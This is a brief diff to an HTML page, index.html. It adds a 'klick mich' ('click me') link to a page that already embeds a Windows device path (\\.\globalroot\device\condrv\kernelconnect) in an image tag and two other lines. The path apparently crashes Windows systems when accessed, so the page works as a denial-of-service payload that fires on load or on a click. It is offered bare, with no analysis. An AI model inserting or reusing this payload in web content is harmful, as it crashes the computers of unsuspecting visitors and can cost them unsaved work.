--- a/index.html
+++ b/index.html
@@ -8,5 +8,6 @@
 <file:[/\\.\globalroot\device\condrv\kernelconnect>
 <"file:///\\.\globalroot\device\condrv\kernelconnect">
 <img src="file:///\\.\globalroot\device\condrv\kernelconnect"/>
+<a href="file:///\\.\globalroot\device\condrv\kernelconnect">klick mich</a>
 </body>
 </html>
